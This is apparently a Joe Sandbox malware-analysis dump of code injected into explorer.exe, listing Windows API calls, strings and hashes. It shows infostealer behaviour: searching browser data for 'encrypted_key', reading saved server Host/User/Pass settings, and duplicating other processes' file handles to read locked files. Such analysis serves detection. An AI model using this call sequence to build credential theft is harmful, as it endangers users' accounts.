                                                                                                                                        • Part of subcall function 007E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,007E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2), ref: 007E1020
                                                                                                                                        • Part of subcall function 007E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1027
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 217796345-0
                                                                                                                                      • Opcode ID: d0c3ff357eda2577dcf5621a8ed30f9f93c4d3b64550f1a2ee2571f968db1c10
                                                                                                                                      • Instruction ID: 613b251175bd99feb4a309a537569609732d7dc52831f22b7b20d6c62e884a52
                                                                                                                                      • Opcode Fuzzy Hash: d0c3ff357eda2577dcf5621a8ed30f9f93c4d3b64550f1a2ee2571f968db1c10
                                                                                                                                      • Instruction Fuzzy Hash: A321A2722072C1AFE7288B269D0AF7B77E9EBCC744F048A2DF58592140E638DD408721
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyW.ADVAPI32(?,?,?), ref: 007E1ED5
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007E1F0C
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 007E1F98
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                      • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007E1F82
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1077800024-0
                                                                                                                                      • Opcode ID: db544485bdec4daf57e7f5def7687afde48fc68ac02b525625291f46ded6f57e
                                                                                                                                      • Instruction ID: 50d0959849a62c525565d982cf68ad6dba6e8bb2ca705fd792525fddbe39dcb7
                                                                                                                                      • Opcode Fuzzy Hash: db544485bdec4daf57e7f5def7687afde48fc68ac02b525625291f46ded6f57e
                                                                                                                                      • Instruction Fuzzy Hash: 7D219C70209381BFD7059B26CC4AD2FBBEDEFC8304F40892CF49992111EB38CD149A62
                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,007E3E1E,00000000,?,007E3FA8), ref: 007E1C46
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,007E3FA8), ref: 007E1C56
                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,007E3FA8), ref: 007E1C91
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,007E3FA8), ref: 007E1C76
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2517252058-0
                                                                                                                                      • Opcode ID: 3b29932cafcbb3c2f04e34e5fadfa910323f091720ace1f11d3d96ba3d7ccdcb
                                                                                                                                      • Instruction ID: 22d3519a3bb3135e7ac44189c36541e9598472e9628137f5efe2f64ab6643699
                                                                                                                                      • Opcode Fuzzy Hash: 3b29932cafcbb3c2f04e34e5fadfa910323f091720ace1f11d3d96ba3d7ccdcb
                                                                                                                                      • Instruction Fuzzy Hash: 5CF0F4312012187BC2241B2ADC8AE7F7B5CEB8A7F9B220B18F405D21A0FB2A6C514170
                                                                                                                                      APIs
                                                                                                                                      • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,007E3E30,00000000,00000000,?,007E3FA8), ref: 007E2FC1
                                                                                                                                      • lstrlen.KERNEL32("encrypted_key":",?,007E3FA8), ref: 007E2FCE
                                                                                                                                      • StrStrIA.SHLWAPI("encrypted_key":",0083692C,?,007E3FA8), ref: 007E2FDD
                                                                                                                                        • Part of subcall function 007E190B: lstrlen.KERNEL32(?,?,?,?,00000000,007E2783), ref: 007E192B
                                                                                                                                        • Part of subcall function 007E190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,007E2783), ref: 007E1930
                                                                                                                                        • Part of subcall function 007E190B: lstrcat.KERNEL32(00000000,?), ref: 007E1946
                                                                                                                                        • Part of subcall function 007E190B: lstrcat.KERNEL32(00000000,00000000), ref: 007E194A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                      • String ID: "encrypted_key":"
                                                                                                                                      • API String ID: 493641738-877455259
                                                                                                                                      • Opcode ID: 898b3b53b0443b903bc3b1724a2e6f4371e9d1098b0799c88be7a7d5ddc12f0d
                                                                                                                                      • Instruction ID: aa6d3f0543ed89104f8c92d90e7be16b4611101c9be7a98534360bd05368fa01
                                                                                                                                      • Opcode Fuzzy Hash: 898b3b53b0443b903bc3b1724a2e6f4371e9d1098b0799c88be7a7d5ddc12f0d
                                                                                                                                      • Instruction Fuzzy Hash: 15E02B227076A47F97216BBE1C5484B7F1CBE4A2103084064F601D3113FF9A8812D2E0
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 007EBB40
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID: winDelete
                                                                                                                                      • API String ID: 3188754299-3936022152
                                                                                                                                      • Opcode ID: b0853793c737eeaa08eca8ffa72d1b2cd435ad249837df64b9a6a8c13e191fd2
                                                                                                                                      • Instruction ID: 2e3cea40e13bc8ad5d191d0ea10a7bbb8676ff7fcbbcd82539bc627808740475
                                                                                                                                      • Opcode Fuzzy Hash: b0853793c737eeaa08eca8ffa72d1b2cd435ad249837df64b9a6a8c13e191fd2
                                                                                                                                      • Instruction Fuzzy Hash: 4F11E575A02298EB8B11AB6B884587E7F75EB99760F104225F801E7284DB389D019652
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,007E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2), ref: 007E1020
                                                                                                                                        • Part of subcall function 007E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1027
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 007E2EE4
                                                                                                                                      • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 007E2F54
                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 007E2F62
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1066184869-0
                                                                                                                                      • Opcode ID: 0f429e1a00111c14b51ca50617d4716a4b8503841909cdb3355ca594c77dfb02
                                                                                                                                      • Instruction ID: 1be05fbe46d1bc5009904be0f12999e2f9c88933adc97ebfe27ff724df7ce806
                                                                                                                                      • Opcode Fuzzy Hash: 0f429e1a00111c14b51ca50617d4716a4b8503841909cdb3355ca594c77dfb02
                                                                                                                                      • Instruction Fuzzy Hash: 5D016231206290ABC7199F22DC1AD6F7BADEFC9350F00442DF85992151EA398D56EBA1
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExitInitializeProcessUninitialize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4175140541-0
                                                                                                                                      • Opcode ID: 7d74f52ea0661175bd53b9bcb5938ab0b95c9b389d291b928dd8465730274ada
                                                                                                                                      • Instruction ID: 473007803959f2f04c8372b5077f432206aac9f0e73dcc1ad915f4db8fa50dd9
                                                                                                                                      • Opcode Fuzzy Hash: 7d74f52ea0661175bd53b9bcb5938ab0b95c9b389d291b928dd8465730274ada
                                                                                                                                      • Instruction Fuzzy Hash: 1EC09B30345240EBE6803BF5DC0D70E3794BF88713F01C814F205C9091FB5444208632
                                                                                                                                      APIs
                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 007E9FF8
                                                                                                                                      Strings
                                                                                                                                      • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 007EA00E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateHeap
                                                                                                                                      • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                                      • API String ID: 10892065-982776804
                                                                                                                                      • Opcode ID: 2528f7d044721bfbba8e29e008fba8ced49d6d05d8f7332a91c7eb3097c847b8
                                                                                                                                      • Instruction ID: d5d1bc5052230e76df70fc1b50cd5a1b695524abaa091ecdfab793bf4edc0bab
                                                                                                                                      • Opcode Fuzzy Hash: 2528f7d044721bfbba8e29e008fba8ced49d6d05d8f7332a91c7eb3097c847b8
                                                                                                                                      • Instruction Fuzzy Hash: DDF08B7760A3C0BAEB305A52AC88F27679CEBCDB85F100819FA41C2241F278BC40C231
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,007E2E83,PathToExe,00000000,00000000), ref: 007E1B16
                                                                                                                                        • Part of subcall function 007E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,007E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2), ref: 007E1020
                                                                                                                                        • Part of subcall function 007E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1027
                                                                                                                                        • Part of subcall function 007E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A1E
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A3C
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A75
                                                                                                                                        • Part of subcall function 007E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A98
                                                                                                                                      Strings
                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 007E1B40
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                      • API String ID: 2162223993-2036018995
                                                                                                                                      • Opcode ID: 4d5a176f666dc0affb3ede996eac313207b271116ae4a8a15fcfafe1c1e149f6
                                                                                                                                      • Instruction ID: e8e0c798e4a291fbf49006cf453eeb9658db2a1174b0e67af36f7b056e05f806
                                                                                                                                      • Opcode Fuzzy Hash: 4d5a176f666dc0affb3ede996eac313207b271116ae4a8a15fcfafe1c1e149f6
                                                                                                                                      • Instruction Fuzzy Hash: F1F02B727016C867C610252BDC89D2B3A4ED7C53A53420029F429C3202FD3A6C805174
                                                                                                                                      APIs
                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 007EA35F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FilePointer
                                                                                                                                      • String ID: winSeekFile
                                                                                                                                      • API String ID: 973152223-3168307952
                                                                                                                                      • Opcode ID: e152c4bb0f9f9c27801b573fa6ac78ab8128eb6f6159ed6c0d8544eb52933103
                                                                                                                                      • Instruction ID: 611db952870aa621d962829d823a31e6125f9a80dd7b34bc21d0697d442e870c
                                                                                                                                      • Opcode Fuzzy Hash: e152c4bb0f9f9c27801b573fa6ac78ab8128eb6f6159ed6c0d8544eb52933103
                                                                                                                                      • Instruction Fuzzy Hash: 4BF0B434615344BFDB119F69DC05DBB77AAEB49320F108369F861C62D4DA30ED4096A1
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(05130000,00000000,?), ref: 007E9EB5
                                                                                                                                      Strings
                                                                                                                                      • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 007E9ECD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                                      • API String ID: 1279760036-667713680
                                                                                                                                      • Opcode ID: eb47a17df620d7bb980bd243e9fca0ce7579ccd8bddfcc1be3e613c565780897
                                                                                                                                      • Instruction ID: 5f59b4c928b010b91c80ae5bd5f5b52133e449deb771d97ea03fa6386b3286a5
                                                                                                                                      • Opcode Fuzzy Hash: eb47a17df620d7bb980bd243e9fca0ce7579ccd8bddfcc1be3e613c565780897
                                                                                                                                      • Instruction Fuzzy Hash: 21E0C27B609220BBC6226B95AC09F2FB769EBDAF10F050015FA00A6260C2389C41C7A2
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(05130000,00000000,?), ref: 007E9EF8
                                                                                                                                      Strings
                                                                                                                                      • failed to HeapFree block %p (%lu), heap=%p, xrefs: 007E9F0E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                                      • API String ID: 3298025750-4030396798
                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3498533004-0
                                                                                                                                      APIs
                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                      APIs
                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000018), ref: 007E12B5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryZero
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 816449071-0
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000,00000000,007E2C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 007E1BAA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      APIs
                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007E1684
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateGlobalStream
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2244384528-0
                                                                                                                                      APIs
                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,007E4A5B,?,?,00000000,?,?,?,?,007E4B66,?), ref: 007E1065
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000003.2343273753.0000000005C99000.00000004.00000020.00020000.00000000.sdmp, Offset: 05C99000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_3_5c99000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      APIs
                                                                                                                                      • CoCreateInstance.COMBASE(008362B0,00000000,00000001,008362A0,?), ref: 007E445F
                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 007E44AA
                                                                                                                                      • lstrcmpiW.KERNEL32(RecentServers,?), ref: 007E456E
                                                                                                                                      • lstrcmpiW.KERNEL32(Servers,?), ref: 007E457D
                                                                                                                                      • lstrcmpiW.KERNEL32(Settings,?), ref: 007E458C
                                                                                                                                        • Part of subcall function 007E11E1: lstrlenW.KERNEL32(?,7556F360,00000000,?,00000000,?,007E46E3), ref: 007E11ED
                                                                                                                                        • Part of subcall function 007E11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007E120F
                                                                                                                                        • Part of subcall function 007E11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1231
                                                                                                                                      • lstrcmpiW.KERNEL32(Server,?), ref: 007E45BE
                                                                                                                                      • lstrcmpiW.KERNEL32(LastServer,?), ref: 007E45CD
                                                                                                                                      • lstrcmpiW.KERNEL32(Host,?), ref: 007E4657
                                                                                                                                      • lstrcmpiW.KERNEL32(Port,?), ref: 007E4679
                                                                                                                                      • lstrcmpiW.KERNEL32(User,?), ref: 007E469F
                                                                                                                                      • lstrcmpiW.KERNEL32(Pass,?), ref: 007E46C5
                                                                                                                                      • wsprintfW.USER32 ref: 007E471E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                                      • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                                      • API String ID: 2230072276-1234691226
                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 007E34C0
                                                                                                                                        • Part of subcall function 007E33C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 007E3401
                                                                                                                                      • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,007E37A8), ref: 007E34E9
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 007E351E
                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 007E3541
                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 007E3586
                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 007E358F
                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,File), ref: 007E35B6
                                                                                                                                      • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 007E35DE
                                                                                                                                      • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 007E35F6
                                                                                                                                      • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 007E3606
                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 007E361E
                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 007E3631
                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 007E3658
                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 007E366B
                                                                                                                                      • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 007E3681
                                                                                                                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 007E36AD
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007E36C0
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,007E37A8), ref: 007E36F5
                                                                                                                                        • Part of subcall function 007E1C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 007E1CC0
                                                                                                                                        • Part of subcall function 007E1C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 007E1CDA
                                                                                                                                        • Part of subcall function 007E1C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 007E1CE6
                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,007E37A8), ref: 007E3707
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                                      • String ID: File
                                                                                                                                      • API String ID: 3915112439-749574446
                                                                                                                                      • Opcode ID: 689f8b5be34f3eff04a72406035566cd86d9a1f4063edba59a3b458326b93083
                                                                                                                                      • Instruction ID: 14238f4070146650d0a4f09098048f9e16947cb3f632d7b159a3def3a06dd138
                                                                                                                                      • Opcode Fuzzy Hash: 689f8b5be34f3eff04a72406035566cd86d9a1f4063edba59a3b458326b93083
                                                                                                                                      • Instruction Fuzzy Hash: F5619D70205380BFD710AF36CC89B2F7BE9FB88754F104928F946A72A1E779DA548B51
APIs
• memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00834502
• memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 0083475F
• memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00834803
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
